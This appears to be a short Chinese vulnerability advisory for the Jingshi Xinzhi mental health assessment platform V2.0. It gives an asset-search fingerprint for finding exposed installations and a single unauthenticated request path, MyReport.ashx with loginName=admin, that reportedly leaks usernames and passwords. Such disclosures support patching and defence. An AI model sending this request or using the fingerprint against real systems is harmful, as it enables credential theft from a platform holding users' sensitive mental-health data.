京师心智心理健康测评系统-前台信息泄露
一、漏洞简介
京师心智心理健康测评系统是一款由北京师范大学心理学专家指导研发的心理健康测评系统。京师心智心理健康测评系统存在信息泄露,攻击者构造特定参数可导致用户名密码泄露。
二、影响版本
京师心智心理测评健康管理平台V2.0
三、资产测绘
body="JS/ligerComboBox/ligerTree.js"
四、漏洞复现
/FunctionModular/PersonalReport/Ajax/MyReport.ashx?type=3&loginName=admin